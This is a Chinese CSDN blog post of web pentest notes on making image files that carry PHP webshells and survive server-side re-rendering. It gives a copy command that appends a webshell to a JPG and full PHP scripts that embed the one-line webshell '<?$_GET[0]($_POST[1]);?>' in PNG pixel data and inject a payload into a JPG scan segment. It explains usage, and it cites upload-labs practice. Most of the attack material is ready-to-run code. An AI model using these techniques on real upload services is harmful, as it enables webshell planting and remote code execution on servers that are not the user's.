制作绕过二次渲染的图片马

最新推荐文章于 2024-05-01 09:02:04 发布
最新推荐文章于 2024-05-01 09:02:04 发布
阅读量8.4k 收藏 37
点赞数 7
分类专栏: web渗透测试笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45519736/article/details/105775721
版权

制作绕过二次渲染的图片马

前言

图片马的三种常用图像格式gif,png,jpg。这里提供三种图片马绕过二次渲染的方法。

一、简单的图片马的制作

准备一张图片(1.jpg),写好一句话木马的文件(1.php)
将1.jpg和1.php放在同一目录下,在该目录下打开cmd命令提示符(也可以打开powershell,然后输入车cmd实现),之后执行命令:

	copy 1.jpg/b + 1.php/a 2.jpg

新生成的2.jpg就是我们制作好的图片马了。
另注: 这类命令还有很多用处,比如将压缩包伪装成图片:

copy/b 1.jpg/b+1.rar/b 2.jpg

b指代的是二进制

二、图片马二次渲染绕过

1、gif图片

对于gif图片,gif图片的特点是无损(修改图片后,图片质量几乎没有损失),我们可以对比上传前后图片的内容字节,在渲染后不会被修改的部分插入木马。对比工具可以使用burp,也可以使用010编辑器(更直观一点)

2、png图片

对于png图片,修改难度大一点,这里提供一个无名大表哥的脚本来生成,原理是通过真实像素的二进制解析写入数据段。脚本如下:

<?php
$p = array(0xa3, 0x9f, 0x67, 0xf7, 0x0e, 0x93, 0x1b, 0x23,
           0xbe, 0x2c, 0x8a, 0xd0, 0x80, 0xf9, 0xe1, 0xae,
           0x22, 0xf6, 0xd9, 0x43, 0x5d, 0xfb, 0xae, 0xcc,
           0x5a, 0x01, 0xdc, 0x5a, 0x01, 0xdc, 0xa3, 0x9f,
           0x67, 0xa5, 0xbe, 0x5f, 0x76, 0x74, 0x5a, 0x4c,
           0xa1, 0x3f, 0x7a, 0xbf, 0x30, 0x6b, 0x88, 0x2d,
           0x60, 0x65, 0x7d, 0x52, 0x9d, 0xad, 0x88, 0xa1,
           0x66, 0x44, 0x50, 0x33);



$img = imagecreatetruecolor(32, 32);

for ($y = 0; $y < sizeof($p); $y += 3) {
   $r = $p[$y];
   $g = $p[$y+1];
   $b = $p[$y+2];
   $color = imagecolorallocate($img, $r, $g, $b);
   imagesetpixel($img, round($y / 3), 0, $color);
}

imagepng($img,'./1.png');
?>

运行脚本即可生成,这里的一句话木马是:

<?$_GET[0]($_POST[1]);?>

使用方式是get传参0=。。。
加上post传参1=。。。

3、jpg图片

直接上脚本,由于jpg图片易损,对图片的选取有很大关系,很容易制作失败

<?php
    $miniPayload = "<?=phpinfo();?>";


    if(!extension_loaded('gd') || !function_exists('imagecreatefromjpeg')) {
        die('php-gd is not installed');
    }

    if(!isset($argv[1])) {
        die('php jpg_payload.php <jpg_name.jpg>');
    }

    set_error_handler("custom_error_handler");

    for($pad = 0; $pad < 1024; $pad++) {
        $nullbytePayloadSize = $pad;
        $dis = new DataInputStream($argv[1]);
        $outStream = file_get_contents($argv[1]);
        $extraBytes = 0;
        $correctImage = TRUE;

        if($dis->readShort() != 0xFFD8) {
            die('Incorrect SOI marker');
        }

        while((!$dis->eof()) && ($dis->readByte() == 0xFF)) {
            $marker = $dis->readByte();
            $size = $dis->readShort() - 2;
            $dis->skip($size);
            if($marker === 0xDA) {
                $startPos = $dis->seek();
                $outStreamTmp = 
                    substr($outStream, 0, $startPos) . 
                    $miniPayload . 
                    str_repeat("\0",$nullbytePayloadSize) . 
                    substr($outStream, $startPos);
                checkImage('_'.$argv[1], $outStreamTmp, TRUE);
                if($extraBytes !== 0) {
                    while((!$dis->eof())) {
                        if($dis->readByte() === 0xFF) {
                            if($dis->readByte !== 0x00) {
                                break;
                            }
                        }
                    }
                    $stopPos = $dis->seek() - 2;
                    $imageStreamSize = $stopPos - $startPos;
                    $outStream = 
                        substr($outStream, 0, $startPos) . 
                        $miniPayload . 
                        substr(
                            str_repeat("\0",$nullbytePayloadSize).
                                substr($outStream, $startPos, $imageStreamSize),
                            0,
                            $nullbytePayloadSize+$imageStreamSize-$extraBytes) . 
                                substr($outStream, $stopPos);
                } elseif($correctImage) {
                    $outStream = $outStreamTmp;
                } else {
                    break;
                }
                if(checkImage('payload_'.$argv[1], $outStream)) {
                    die('Success!');
                } else {
                    break;
                }
            }
        }
    }
    unlink('payload_'.$argv[1]);
    die('Something\'s wrong');

    function checkImage($filename, $data, $unlink = FALSE) {
        global $correctImage;
        file_put_contents($filename, $data);
        $correctImage = TRUE;
        imagecreatefromjpeg($filename);
        if($unlink)
            unlink($filename);
        return $correctImage;
    }

    function custom_error_handler($errno, $errstr, $errfile, $errline) {
        global $extraBytes, $correctImage;
        $correctImage = FALSE;
        if(preg_match('/(\d+) extraneous bytes before marker/', $errstr, $m)) {
            if(isset($m[1])) {
                $extraBytes = (int)$m[1];
            }
        }
    }

    class DataInputStream {
        private $binData;
        private $order;
        private $size;

        public function __construct($filename, $order = false, $fromString = false) {
            $this->binData = '';
            $this->order = $order;
            if(!$fromString) {
                if(!file_exists($filename) || !is_file($filename))
                    die('File not exists ['.$filename.']');
                $this->binData = file_get_contents($filename);
            } else {
                $this->binData = $filename;
            }
            $this->size = strlen($this->binData);
        }

        public function seek() {
            return ($this->size - strlen($this->binData));
        }

        public function skip($skip) {
            $this->binData = substr($this->binData, $skip);
        }

        public function readByte() {
            if($this->eof()) {
                die('End Of File');
            }
            $byte = substr($this->binData, 0, 1);
            $this->binData = substr($this->binData, 1);
            return ord($byte);
        }

        public function readShort() {
            if(strlen($this->binData) < 2) {
                die('End Of File');
            }
            $short = substr($this->binData, 0, 2);
            $this->binData = substr($this->binData, 2);
            if($this->order) {
                $short = (ord($short[1]) << 8) + ord($short[0]);
            } else {
                $short = (ord($short[0]) << 8) + ord($short[1]);
            }
            return $short;
        }

        public function eof() {
            return !$this->binData||(strlen($this->binData) === 0);
        }
    }
?>

运行脚本命令:

jpg_payload.php 1.jpg

本文脚本来源于https://www.fujieace.com/penetration-test/upload-labs-pass-16.html,可以去看看详细

full stack cainiao
关注
  • 7
    点赞
  • 37
    收藏
    觉得还不错? 一键收藏
  • 8
    评论
专栏目录
CTFSHOW web164 PNG二次渲染脚本(生成图片
05-04
这段PHP代码创建了一个32x32的真彩色图片,并将一个数组中的RGB值作为像素颜色填充到图片上,最后将图片保存为名...另外,这段代码还暗藏了一个木内容,可以通过GET请求调用POST请求中的参数作为函数名执行任意代码。
ctfshow web165 JPG二次渲染脚本(生成图片)脚本
10-21
ctfshow web165 JPG二次渲染脚本(生成图片)脚本
【文件上传绕过】--二次渲染
nareku的博客
04-07 8410
二次渲染原理 在我们上传文件后,网站会对图片进行二次处理(格式、尺寸,保存,删除 要求等),服务器会把里面的内容进行替换更新,处理完成后,根据我们原有的图片生成一个新的图片(标准化)并放到网站对应的标签进行显示。 绕过方法 1.配合条件竞争漏洞 ...
jpg图片使用条件竞争的方法实现二次渲染绕过
wutiangui的博客
06-30 485
然后打开一个本地图片,将其路径改成上传的图片的路径,并使用文件包含方法直接调用连接参数执行一句话木,以下结果可从历史抓包数据里获得。然后先启动访问图片的攻击,再启动生成图片的攻击,观察访问图片的攻击结果,按长度排序可以获取攻击成功的数据,如下所示。清除所有变量,payloads做如下设置。首先使用cmd制作jpg图片。然后打开bp拦截上传该图片。对拦截的结果发送到攻击模块。设置payloads如下。
2024年最新ctfshow WEB入门 文件上传151-170_ctfshow web入门文件包含167
2401_84302583的博客
05-01 407
该方法应该只有在LINUX有用。
图片二次渲染绕过
m0_59049258的博客
09-10 785
以upload-labs靶场第十七关为例。
【文件上传绕过】——二次渲染漏洞
热门推荐
weixin_45588247的博客
07-28 1万+
copy a.png /b + a.php /a 1.png: http://www.xue51.com/soft/47175.html =================================================== 1. png图片组成:   png图片由3个以上的数据块组成。   PNG定义了两种类型的数据块,一种是称为关键数据块(critical chunk),这是标准的数据块,另一种叫做辅助数据块(ancillary chunks),这是可选的数据块。   关键数据块定义
文件上传之二次渲染绕过
qq_40800734的博客
05-04 6988
前记 upload-labs,是一个关于文件上传的靶场.具体的write-up社区里也都有文章. 不过我在看了pass-16的源码后,发现了一些有意思的东西. 分析问题 关于检测gif的代码 第71行检测$fileext和$filetype是否为gif格式. 然后73行使用move_uploaded_file函数来做判断条件,如果成功将文件移动到$target_path,就会进入二次...
制作图片二次渲染(upload-labs第17关)
m0_72286569的博客
03-12 2138
在本关的代码中这个imagecreatefromjpeg();函数起到了将上传的图片打乱并重新组合。这就意味着在制作图片的时候要将木插入到图片没有被改变的部分。
【后端检测-绕过】文件头检测绕过二次渲染绕过
07-03 5292
【后端检测-绕过
解决echarts数据二次渲染不成功的问题
10-15
在本文中,我们将深入探讨如何解决ECharts数据二次渲染不成功的问题。ECharts 是一个基于 JavaScript 的开源可视化库,广泛用于创建各种图表。在某些场景下,比如动态更新数据或者根据用户交互改变图表内容时,我们...
POC.rar_绕过GD渲染
09-21
本案例中的"POC.rar_绕过GD渲染"是一个关于如何绕过GD库进行编码的PHP信息泄露漏洞的证明。GD库是PHP中常用的图形处理库,用于创建、修改和处理图像。然而,它可能成为攻击者利用的潜在入口点。 GD库在处理图像时,...
web安全,文件上传制作图片的小工具 Hexcmp.7z
11-21
web安全,文件上传图片上传,制作图片,将图片以16进制打开。
AE二次开发常用功能代码
06-20
在AE(ArcGIS Engine)的二次开发中,C#编程语言是常见的选择,因为它提供了丰富的功能和灵活性,便于实现各种GIS(Geographic Information System)功能。以下是一些关键知识点: 1. **投影对象操作**: - 在GIS中,...
图片渲染动画
07-09
在IT行业中,图片渲染动画是一种常见且重要的技术,特别是在用户界面设计和移动应用开发中。本文将深入探讨“图片渲染动画”这一主题,...在实际开发过程中,不断地探索和优化,才能制作出既美观又高效的图片渲染动画。
文件上传之二次渲染专用
01-19
"文件上传之二次渲染专用" 这个标题暗示我们关注的焦点是关于文件上传后进行特定处理的过程,比如“二次渲染”,这可能指的是对上传文件进行额外的处理,如图片缩略图生成、文档预览或是视频转码等。二次渲染通常是...
SketchUp二次开发全套教程
最新发布
07-15
二次开发中的模型渲染与材质处理.pdf SketchUp二次开发中的碰撞检测与物理引擎.pdf SketchUp二次开发项目管理与版本控制.pdf SketchUp二次开发中的用户界面设计.pdf SketchUp二次开发案例分析与实战演练.pdf ...
Rhino二次开发全套教程
07-15
Rhino软件基础操作与界面介绍.pdf Rhino软件二次开发环境搭建.pdf ...Rhino二次开发中的渲染技术应用.pdf Rhino二次开发中的网络通信.pdf Rhino二次开发中的多线程编程.pdf Rhino二次开发综合项目实战.pdf
java里奥游戏图片素材
07-19
### 回答1: Java里奥游戏图片素材是用于开发基于Java语言编写的里奥游戏的原始图像资源。里奥游戏是一款经典的平台跳跃游戏,具有丰富多样的游戏场景、角色和道具。而图片素材则是这款游戏中所需的各种图像元素,包括背景图、人物形象、敌人和障碍物、道具物品等等。 通过使用Java里奥游戏图片素材,开发者可以方便地构建整个游戏的画面效果,使游戏更加生动、有趣。这些素材通常以图片文件的形式存在,可以通过加载和绘制来实现在游戏画面中的显示。 有了丰富多样的图片素材,开发者可以设计出各种不同的游戏场景,例如大陆、森林、城市等等,每个场景都可以有不同的背景图和障碍物元素。此外,还可以绘制出里奥和敌人的角色形象,以及各种道具物品,例如蘑菇、金币和火花等,丰富游戏的玩法和体验。 在游戏开发中,使用图片素材可以大大提升开发效率,减少开发者绘制图像的工作量。此外,Java的图形库提供了丰富的绘制函数和工具,能够方便地实现图片的加载、缩放、旋转等操作,为游戏的视觉效果增添更多的可能性。 总之,Java里奥游戏图片素材是为开发基于Java语言编写的里奥游戏所准备的图像资源,通过使用这些素材,可以方便地打造出丰富多样的游戏画面,提升游戏的视觉效果和玩家的游戏体验。 ### 回答2: Java里奥游戏图片素材是指在Java编程语言中使用的用于设计和展示里奥游戏的图像元素。这些素材通常用于游戏中的角色、背景、道具、敌人等各种元素的绘制和展示。在开发Java里奥游戏时,使用图像素材可以增加游戏的趣味性和可玩性。 Java里奥游戏图片素材可以包括不同种类的图像,比如里奥和他的朋友、敌人和怪物,各种背景场景,以及与游戏情节相关的各种游戏道具和装备。这些素材通常由游戏开发者绘制或者从其他资源中获取,并经过处理和优化后嵌入到游戏中。 为了实现游戏的画面效果,Java里奥游戏图片素材常常需要具备一定的绘画技术和美术设计能力。游戏开发者可以使用各种绘图工具和软件来创建和编辑图片素材,比如Photoshop、Illustrator等。同时,还可以从网络上获得一些免费或付费的图像素材库,这些库中包含了大量的游戏图像素材,可以帮助开发者更快速地构建游戏。 总结来说,Java里奥游戏图片素材是Java游戏开发中用于展示和设计游戏画面的图像元素。它们丰富了游戏的视觉效果,增加了游戏的趣味性和可玩性,需要游戏开发者具备一定的绘画技术和美术设计能力,同时也可以通过购买或下载免费图像素材库来获取所需的素材。 ### 回答3: Java里奥游戏图片素材可以通过多种方式获取和使用。 首先,可以通过搜索引擎在互联网上找到各种类型的游戏素材网站。这些网站通常提供大量的里奥游戏相关的图片素材,包括里奥的角色、场景、道具等。可以根据需要选择和下载合适的素材,并根据需要进行编辑和修改。 此外,也可以考虑使用图像处理软件或设计工具来自己创作里奥游戏图片素材。例如,使用Photoshop、Illustrator等软件可以绘制、编辑和导出不同格式的里奥游戏图片。这样可以更好地满足个性化需求,制作出独特而精美的游戏素材。 在使用Java开发里奥游戏时,可以使用各种图像处理库和框架来加载和显示图片素材。例如,Java提供了自带的`javax.imageio`包,可以通过`ImageIO`类加载图片,并将其转换为`BufferedImage`对象。然后可以使用`Graphics2D`类对图片进行进一步处理,例如缩放、旋转、绘制等操作。 最后,在将图片素材添加到Java里奥游戏中时,可以使用各种方法来实现图片的绘制和动画效果。例如,可以使用`JPanel`类创建游戏场景,并在`paintComponent`方法中通过`Graphics`对象绘制图像。还可以使用定时器或线程来实现图像的动画效果,例如改变图片的位置、大小、透明度等属性。 总之,获取和使用Java里奥游戏图片素材的方式多种多样,可以通过互联网下载现成的素材,也可以使用图像处理软件自己创作。在使用Java开发游戏时,可以利用相关库和框架加载、显示和处理图片素材,以实现更好的视觉效果和动画效果。
评论 8
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值